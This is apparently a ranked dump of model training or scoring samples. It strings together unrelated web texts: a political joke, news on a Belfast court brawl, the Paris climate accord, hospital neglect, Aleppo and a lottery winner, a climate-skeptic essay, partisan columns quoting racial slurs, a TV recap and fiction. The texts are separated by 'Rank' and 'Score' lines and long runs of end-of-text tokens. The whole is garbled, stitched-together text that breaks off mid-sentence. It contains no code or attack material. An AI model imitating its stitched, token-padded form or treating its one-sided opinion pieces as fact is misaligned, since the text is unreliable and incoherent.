talk? Flights go quicker if you strike up a conversation with your fellow passenger." + +The little girl, who had just started to read her book, replied to the total stranger, "What would you want to talk about?" + +"Oh, I don't know," said the congressman. "How about global warming, universal health care or stimulus packages?" as he smiled smugly. + +"OK," she said. "Those could be interesting topics but let me ask you a question first. A horse, a cow and a deer all eat the same stuff - grass. Yet a deer excretes little pellets, while a cow turns out a flat patty but a horse produces clumps. Why do you suppose that is?" + +The legislator, visibly surprised by the little girl's intelligence, thinks about it and says, "Hmmm, I have no idea." + +To which the little girl replies, "Do you really feel qualified to discuss global warming, universal health care or the economy when you don't know crap?" + +Then she went back to reading her book.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 26; Score = 991232.0 +<|begin_of_text|>Contempt at court: Mother walking her baby in a pram and woman 'in her 40s' pull hair and draw blood during fierce fight outside Belfast trial + +Women got i nto altercation outside La ganside Cou rt in Belfast + +One woman in her 20's was with a baby in a pram at the time + +Security guard had to drag the pair apart and court staff took one inside + +Two women pulled each others hair, scratched and drew blood during a fight outside a court in Belfast. + +The violent altercation began after the unidentified pair, who are thought to have known each other, clashed outside Laganside Court in the Northern Irish capital. + +A security guard had to step in to separate the two women, who had each other in a fierce hold, before court staff escorted one inside for her own protection. + +Fierce: The older woman pulled on the other females hair during the violent altercation Pain: The red-haired woman tries to wriggle away from the grasp of the attacker Grab: The older woman goes for the throat of the mother, who was looking after her baby at the time + +One of the women, said to be in her 20s, was walking her young child in a pram alongside a male friend who allegedly shouted 'I am going to stamp on your son's head' to the other woman, said to be in her 40s. + +The older woman then ran over, grabbed her younger opponent and began to pull her hair. + +She then managed to draw blood before a security guard was forced to drag the pair apart. + +A witness outside the court said: 'One of the women was in her 40's and the other was in her 20's, it looked like they knew each other. + +'The woman with the red hair had a pram with a young baby inside. + +'A man she was with then shouted something like "I am going to stamp on your son's head". + +Hold: A security guard was forced to intervene and managed to separate the pair Injury: The red-haired woman was escorted into the court building with blood dripping from her eyebrow Gesture: The woman pointed at her opponent as she walked away from the scene + +'It was all over very quickly, security guards rushed in to break them up.' + +An ambulance was called to the scene, but the women had left before it arrived. + +Photographers captured the scrap while they covered the case of Marian McGlinchey, the Old Bailey bomber. + +A spokesman for the Police Service of Northern Ireland confirmed there had been an incident and added that +================================================================================ +Rank = 27; Score = 970752.0 +<|begin_of_text|>This is a rush transcript. Copy may not be in its final form. + +AMY GOODMAN: President Donald Trump says he’ll make his announcement today on whether to pull the United States out of the landmark Paris climate accord, a decision environmentalists warn would be a crime against the future of the planet and humanity. On Twitter, Trump said he would make the announcement at 3:00 p.m. Eastern time in the White House Rose Garden, and ended his tweet with, quote, ”MAKE AMERICA GREAT AGAIN!” + +In 2015, nearly 200 nations agreed in Paris to the global accord to curb rising greenhouse gas emissions blamed for warming the planet. The climate pact was heralded as a rare moment of international collaboration to avert imminent climate disaster. Now The Guardian is reporting China and the European Union plan to forge an alliance to take a leading role in tackling climate change, in response to Trump’s expected decision to pull out of the agreement. The new alliance will reportedly focus on leading the energy transition toward a low-carbon economy. An early draft of the announcement from the two countries describes climate change as a national security issue and multiplying factor of social and political fragility. + +On Wednesday in Brussels, Belgium, members of the European Parliament booed reports that Trump will likely pull the U.S. out of the Paris accord. European Commission President Jean-Claude Juncker said the administration will have a hard time withdrawing. + +JEAN-CLAUDE JUNCKER: [translated] That’s not how it works. The Americans can’t just leave the climate protection agreement. Mr. Trump believes that, because he doesn’t get close enough to the dossiers to fully understand them. It would take three to four years after the agreement came into force in November 2016 to leave the agreement. So this notion—”I am Trump, I am American, America first, and I am going to get out of it”—that won’t happen. + +AMY GOODMAN: On Wednesday, the United Nations tweeted, “Climate change is undeniable. Climate action is unstoppable. Climate solutions provide opportunities that are unmatchable.” As the world awaits Trump’s final decision, leaders from Brussels to Beijing reaffirmed their commitment to implement the Paris climate accord, and urged the United States not to become a global pariah. This is the German ambassador to the U.S., Peter Wittig, speaking to the PBS NewsHour. + +PETER WITTIG: We have been a staunch advocate of the Paris Agreement. We think it’s a landmark achievement. It’s +================================================================================ +Rank = 28; Score = 958464.0 +<|begin_of_text|>If I believed the Earth was slowly turning into cheddar cheese, I could invoke this theory to explain a lot of things. Why is the rat population in our major cities growing so quickly? Earth cheesification is providing more rat food. Why have there been so many earthquakes lately? The cheesification of the tectonic plates has made them less resistant to sudden shifts. Why are glaciers melting? The freezing point of cheddar cheese is lower than that of water; as the Earth at the poles undergoes cheesification, the unfrozen cheese is causing a slight warming of the ice sheets from below, resulting in unusual levels of melting. + +Then we would be at liberty to publish headlines such as this : “Research suggests warmer summers could be causing colder winters.” This conjecture, brought to you via the magical theory of global climate change, is reported as though it is the most plausible explanation of the peculiar fact that Canadian winters do not appear to be getting any warmer. + +If, however, we could devise a theory that might literally be able to repel absolutely any possible counter-evidence, then we would have accomplished something truly diabolical: an unfalsifiable theory. If we could indeed devise such a theory, then we could run wild explaining anything and everything, and absorb absolutely any eventuality, without ever needing to question our faith in the underlying hypothesis. + +I could go on like this for a long time, I suppose. At some point, however, you would confront me with some natural fact that I could not logically account for by means of my cheese theory. In other words, even the greatest faith in this underlying assumption could never withstand all possible evidence. + +Question you aren’t supposed to ask: Why is the non-warming of recent winters a peculiar fact in need of an explanation? After all, did anyone in the past harbor any presumption that winters ought to be getting warmer? Why should they? The difference, of course, is that in the age of global warming, everyone is supposed to know, beyond any doubt, that the Earth is indeed getting significantly warmer. Thus, every time someone casually observes that the weather is pretty chilly, or that there has been a lot of snow, all hearers in the room look at their hands awkwardly, smirk bemusedly, or display some other symptom of that feeling familiar to anyone who has had to face doubts about a deeply held religious belief: “But this just can’t be true, because if it is, then my world is about to crumble.” + +The world of anthropogenic global +================================================================================ +Rank = 29; Score = 954368.0 +<|begin_of_text|>Emmanuelle Racine broke down in tears when she arrived to visit her grandfather at the Gatineau Hospital last week and found him naked and soiled. + +"He was completely naked, he was hiding himself with a little napkin," she said, describing 93-year-old Royal Racine, a Second World War veteran. + +"He was soaked in urine." + +Royal Racine had recently been hospitalized with pneumonia for the eighth time and cried out to the family, "I'm freezing," as they entered the room Oct. 19, she recalled. + +In addition to suffering pneumonia, the elderly man is incontinent and in the early stages of dementia. + +Emmanuelle Racine said she started to cry when she arrived at Gatineau Hospital Oct. 19 to find her 93-year-old grandfather naked, soiled and uncovered. (Radio-Canada) + +'How can they treat him like that' + +The nursing staff the family tracked down complained about missing personnel and told them he'd been left naked and uncovered for more than an hour, Emmanuelle Racine told Radio-Canada in a recent interview. + +"I started to cry because I was like, how can they treat him like that, you know?" she said. + +Royal Racine is being treated for pneumonia at Gatineau Hospital and is due to be released Friday. (CBC) + +And it wasn't the first time she'd found her grandfather soiled with no covers, she added. + +On another visit just days earlier on Oct. 14, she smelled the urine and waste before walking through the door, she said. + +When Royal Racine saw his granddaughter and son, Marcel Racine, he said, "Why are they doing this to me?" Emmanuelle Racine remembered. + +'What happens when we're not there?' + +On that occasion, nurses confirmed to the family Royal Racine had been left without covers or clothes since supper about two hours earlier, Marcel Racine said. + +The family has been reluctant to launch a formal complaint with the hospital while Royal Racine is still a patient there, out of fear his care will worsen. + +Instead, Marcel Racine wrote an email to Quebec Health Minister Gaétan Barrette, along with photos of his father, imploring the minister to investigate. The family has since received a response saying their letter was received. + +Emmanuelle Racine also took photos of her grandfather at the hospital on Oct. 14. (Emmanuelle Racine) + +"What happens when we're not there?" Marcel Racine told Radio-Canada. "I +================================================================================ +Rank = 30; Score = 950272.0 +<|begin_of_text|>Kitten, an American tabby residing in England, is a frustrated cat. He knows his place in the world: he was born to kill. Killing, after all, is what felines are supposed to do. Confined within his Lady's house, however, the young fellow is deprived of the opportunity to hunt live prey. The mansion is a sterile playground for a predator; offering nothing more than furniture which allows itself to be brutalized far too easily. The ambitious cat is bored and hungry for a challenge. + +Kitten learns of a passage hidden in his Lady's library: the Door, which leads to an unknown world. The cat has been told that the source of all evil dwells openly in this place. The feline is eager to fight the sinister personage and goes through the Door with no hesitation. + +The tabby finds himself in what appears to be a forest like any other in England. It doesn't take long for him to learn that this is a very different place. + +Written in the style of classic fantasies, this novel can be appreciated on different levels. To some readers, it's an allegorical tale: thought-provoking and filled with symbolism. To others, it's an adventure-filled page-turner. + +This book can be read as a stand-alone novel (doesn't end with a cliff-hanger) but there is a second (concluding) volume available entitled FINALE.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 31; Score = 921600.0 +<|begin_of_text|>A man in a white coat, smiles, offers an injection to an infant who is alone. “Innoculation is the perfect Medication” he tells the child after dancing and singing with a syringe. The nurse tells the children elsewhere that if they are vaccinated with the MMR they won’t get the Measles, Mumps and Rubella. Will it hurt asks the boy, well it might says DR Ranj, but you can cry if you want to. Without waiting for an OK, the doc injects the boy who says “I am not ready for my ‘jection”, but the doc marvels“I have already done it”. (sic) + +Even if you didn’t see the TV show described above – and I didn’t – you probably sense the writer of that description didn’t approve of it and you probably won’t be surprised that the doctor and infant in question looked something like this: + +In case you missed it, only one of the characters in the above pic is real and he is a real-life medical doctor, Dr Ranj. The CBeebies Get Well Soon series is aimed at pre-school children. According to comments from parents about the series on the Dr Ranj fb page, toddlers love the show, which is intended to “help children understand their bodies and to see the medical world as an environment in which they feel safe”. (Source) + +The series has covered a range of uncontroversial conditions like verruccae, constipation and conjunctivitis. I was unaware of it until I got wind of some 60 or so complaints to the BBC about the content of an episode called, Inject to Project. Cue much bristling and hissing from those who say, + +“Vaccination is the longest running hoax perpetrated by Allopathy, the most pernicious, and the most dangerous thing that your children will ever face.” + +That quote appears on many websites, including the one called ‘Arnica UK Parents Support Network’, which is run by Anna Watson, who authored the above passage and who is apparently spearheading the campaign to complain about the show. + +Anna challenges whether it is legal “to promote medicines to children suggesting that they are 100% safe” and whether it is ethical “to promote medicines to children suggesting that they are 100% effective”. + +This presumably refers to the bit where the show’s ‘Nurse Morag’ is telling a group of infants that the MMR jabs will stop them getting the measles, mumps and rubella, not the bit where the +================================================================================ +Rank = 32; Score = 921600.0 +<|begin_of_text|>New York Times columnist Paul Krugman says that the Republican Party has adopted extreme anti-immigrant positions to appeal to their base, “which is, by and large, elderly white people arguing with empty chairs.” + +During a Sunday panel segment on ABC News, Krugman pointed out that Clint Eastwood’s bizarre conversation with an empty chair at the Republican National Convention last month was illustrative of the party’s base. + +“Arizona is a third Hispanic,” conservative columnist George Will noted. “The Republican Party spent 20 debates in the primary competing to see who could build the longest, thickest, tallest, most lethally-electrified fence. And Hispanics said, ‘I detect some hostility here.’ And it’s going to take a long time to undo that.” + +Krugman agreed that the GOP’s move to the extreme right during the primary had hurt their standing with minority voters. + +“The Republican Party is where it is because that’s where the base is,” Krugman agreed. “You watch that whole primary process, Republican candidates had to appeal to their base, which is, by and large, elderly white people arguing with empty chairs.” + +Tea party favorite Sen. Rand Paul (R-KY) also lamented that the Republican Party had completely given up on winning certain parts of the country. + +“So what I keep telling them is, maybe we need some libertarian-type Republicans who might be popular in those areas,” he explained. “Maybe a less aggressive, more socially tolerant, but still fiscally conservative policy that that may be more libertarian might do better in California, might do better in Oregon, Washington, New England.” + +“Our problem in the presidential election is we’ve given up 150 electoral votes before we get started.” + +Watch this video from ABC’s This Week, broadcast Sept. 9, 2012.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 33; Score = 921600.0 +<|begin_of_text|>The opinions expressed by columnists are their own and do not represent the views of Townhall.com. + +Donald Trump once called the Rev. Al Sharpton "a con man," meaning that Sharpton plays the race card less out of sincerity and more as a method to make demands and extract concessions. + +But has there ever been a bigger legislative con man than the soon-to-be-retired Rep. Charlie Rangel, D-N.Y., currently the second-longest serving member of the House? His glossary of race-baiting is exhaustive. Just a few examples: + +In criticizing the Republican-run house, Rangel said, "It's not'spic' or 'n-----' anymore. (Instead) they say, 'Let's cut taxes.'" + +In accusing the then-President of racism, Rangel said "George (W.) Bush is our Bull Connor" (referring to the racist Southern lawman who sicced dogs and turned water hoses on civil rights marchers). + +In accusing the Republican Party in general of racism, Rangel said, "Everything we believe in, everything we believe in, (Republicans) hate. They don't disagree -- they hate.... Some of them believe that slavery isn't over and that they won the Civil War." + +On the tea party, Rangel said: "(Obama) really thought -- and maybe it was the water they drink at Harvard -- that he could deal with the tea party. They are mean, racist people. Now why do I say that? Because in those red states, they're the same slaveholding states -- they had the Confederate flag. They became Dixiecrats -- they had the Confederate flag. They're now the tea party." + +And: "(The tea party) is the same group we faced in the South with those white crackers and the dogs and the police. They didn't care about how they looked. It was just fierce indifference to human life that caused America to say enough is enough. 'I don't want to see it and I am not a part of it.' What the hell?! If you have to bomb little kids and send dogs out against human beings, give me a break." + +Yet now as the clock winds down on his career, Rangel is free -- free to tell the truth about "race." Rangel, in assessing why Hillary Clinton lost the race to Donald Trump, rejects the analysis advanced by the losing Clinton camp. At the Harvard post-election symposium, top Clinton aides accused Trump campaign manager Kellyanne Conway of blatantly courting America's white rac +================================================================================ +Rank = 34; Score = 909312.0 +<|begin_of_text|>Article by: Anthony Florez + +Spoilers ahead! Spoilers ahead! Spoilers ahead! + +The Door is, in my opinion, the first great episode of season six. With the Kingsmoot hastily completed the Ironborn’s role in the greater game is finally established. Jon and Sansa are setting out to liberate the north, without the aid of Littlefinger (although I have a feeling the Knights of the Vale won’t be packing up and heading home just yet). Arya has a new assignment at Assassin Academy, which still feels middling, but that’s alright. And things took a turn for the crazy pants up at Holy Tree Fort where Bran pulled a bonehead move that brought the Undead Army down around everyone’s ears. The big revelation, however, was the simultaneous origin and fate of Hodor and- stop looking at me, I’m not crying, you’re crying, stupid jerk-face with your face of a jerk. + +Deanerys is rolling out once again with an even bigger army of primitives but not before sending Jorah the Andal off on what may be his final mission: find a cure for the greyscale infection that is slowly turning him into The Thing from those awful Fantastic Four movies. Call me a big ole sap but there is something trite but compelling about, “I love you. I’ll always love you. Now I have to leave, bye forever.” Even with Daario waiting in the wings with an expression that seemed to say, “I am still going to be hitting that, though, right.” Probably, Daario. But keep it in your banana-hammock until we get back to Mereen. You just know that guy wears bikini underwear. + +Tyrion has made an interesting decision to enlist the support of a new friend in the form of a Red Priestess of the Lord of Light. I like that Varys confronts the woman and makes an interesting case about fanaticism directly to her face and like any true zealot she is only more certain of herself and her belief. This whole idea feels like making a wish on a cursed monkey’s paw and hoping for the best, nothing good happens when asking for help from religious crazies or do we need to ask Stannis Baratheon how that turns out. Granted, Melisandre is a lot more tolerable now that she isn’t advocating kid fires but that’s only because she’s experienced real doubt and loss of purpose. This Red Lady in Mereen still has that crazy lady sheen to +================================================================================ +Rank = 35; Score = 901120.0 +<|begin_of_text|>Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings. + +Nov. 28, 2016, 2:52 PM GMT / Updated Nov. 29, 2016, 4:07 AM GMT By Alexander Smith + +A mother and daughter whose tweets have offered heartbreaking insight into Syria's civil war were "on the run" Monday as the pro-regime troops pushed into a rebel-held area of Aleppo. + +Seven-year-old Bana al-Abed and her mother, Fatemah, have provided dispatches from the front line and gained some 140,000 Twitter followers. + +Related: 'Bye': Terrified Family Tweeting From Inside Aleppo Says Farewell + +Fatemah told NBC News last month how her daughter had "started to ask me if we are going to die in the bombings." + +On Monday, following an intensifying attack by the forces of President Bashar al-Assad, Fatemah tweeted that she had been injured when her home was bombed the night before and that her family is now "on the run." + +She also shared that her daughter was frightened for her life. The tweet came a day after a photo of a dust-covered and clearly shocked Bana was also posted. + +Later Monday, the account posted: "We have no home now. I got minor injury. I didn't sleep since yesterday, I am hungry. I want to live, I don't want to die. — Bana." + +Fatemah later told NBC News' Richard Engel Monday night that they were relatively safe at a friends house and Bana was sleeping. + +This photo, provided by her mother, shows Bana sleeping relatively safe and sound in Aleppo, Syria, on November 28, 2016. NBC News + +"She didn’t sleep last night and all the day because there is always bomb and warplane in the sky," Fatemah said of her daughter. + +"Aleppo is bleeding, really it’s bleeding, Aleppo it's suffering very much," she said. + +"We are under siege for some three months... the people here are suffering from hunger, and now they are suffering from bombs, they don’t know how... how they deal with this, this, inhumanity," she added. + +Related: Syria's Rebels May Have Just Suffered Debilitating Defeat + +According to a United Nations report, nearly a million Syrians are living under siege in Aleppo, and officials have described the situation as "a slaughterhouse."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 36; Score = 880640.0 +<|begin_of_text|>ZEPHYRHILLS — An 84-year-old Zephyrhills woman who rarely left her tiny duplex stepped forward Wednesday as the winner of the largest single jackpot in American lottery history, valued at $590.5 million. + +Shortly after claiming her prize, Gloria C. MacKenzie stepped back into the shadows. + +Lottery officials announced midmorning that the Powerball winner had arrived with the lone winning ticket, which was sold last month at a Zephyrhills Publix. + +"They walked right through the headquarters of the Florida Lottery here in Tallahassee and said, 'I have a winning ticket and I'd like to validate it,' " Lottery Secretary Cynthia O'Connell said at a news conference. + +MacKenzie, her face hidden behind large black sunglasses, arrived with her son Scott, a family friend and her financial and legal advisers. She said nothing to the pack of reporters who swarmed her. + +Neighbors in Zephyrhills said that guarded profile fits with what they know of MacKenzie. + +"She liked to talk, but not with everybody," said Jorge Trapero, who lives in the apartment attached to MacKenzie's, across from a cow pasture. + +He said she was strong: "Sometimes she'd come from the store to buy something and I'd see her over there taking the bags. 'Gloria you want some help?' She'd say, 'No, no, no, it's okay. I can do it.' " + +Neighbor Bruce Featherston described the area as working class — "where people are really struggling." + +"I assumed she was just an elderly lady scraping to get by," he said of MacKenzie. "She never had anything fancy." + +Now she's walking away with a lump sum payment of more than $370 million, before taxes. + +• • • + +In a statement, MacKenzie called the winnings a blessing, and recalled how a person in line at Publix allowed her to go ahead to buy her single Quick Pick ticket. + +Mindy Crandell, 34, was in line at Publix with her two daughters that day, she said, when a woman stepped in front of her. + +"I don't know that she was intentionally cutting," Crandell, who lives in Dade City, said in an interview Wednesday, "or maybe she didn't realize she did it." + +Crandell let it go. She was worried about keeping her 5-year-old, Jeffa, entertained. + +Later, when she heard about the winner she couldn't help but think it might +================================================================================ +Rank = 37; Score = 876544.0 +<|begin_of_text|>Chapter One + +The first experience of life was a bright point of light followed by the sound of distant, muted whispers. A flood of sensory information registered self-awareness, when just before there was only a sea of blackness. A new mind took inventory of the world surrounding him: his chest, rising and falling with the sensation of air rushing into his lungs; the taste of saliva and the contraction of throat muscles as he swallowed; hands that opened and closed into fists as he commanded; all virgin experiences, so it seemed, for a man who was just born inside a coffin. + +Lying supine, he blinked several times, struggling to make sense of his narrow confines. A glass shield was just inches from his face, where he gazed with frustrating uncertainty upon a reflection that was his own. An older man, with creases stretched across a high forehead and steel-grey eyes set upon severe cheekbones, returned the bewildered stare. + +Who am I? this lost soul asked, struggling to reach backwards in time for a memory or reference, anything to place this surreal state of being into context. But there was nothing there, and the sea of blackness prevailed. + +As he tried to lift his shoulders, a medical device descended from inside the chamber and passed a bluish light over the entire length of his body. It was then that he realized the base of his skull was fastened to the bed’s surface, and that the connection was through a metallic socket implanted directly into the bone. + +I am a capsuleer, he realized, peering through the glass at a ceiling high above. One of the immortals, but... what happened to me? The device hovered over his squinting eyes before an artificial voice spoke softly: + +‘Good morning. Your vital signs are excellent. Try to relax while I assess the rebuilding progress of your temporal lobe. Scanning...’ + +With the centre light focusing on his eyes, additional beams were projected onto his face. Then he felt a tingling sensation in the back of his head. + +‘I’m going to ask you several questions,‘ the voice continued. He found her voice soothing, despite its artificial tone. ‘Do you know what today’s date is?’ + +‘No,‘ he answered. ‘Where am I?’ + +The voice remained impassive, but gentle. ‘Do you know what your name is?’ + +He was about to answer ‘No’ in desperation again when a bright flash illuminated the room beyond the glass, followed by a loud muffled thud that shook +================================================================================ +Rank = 38; Score = 876544.0 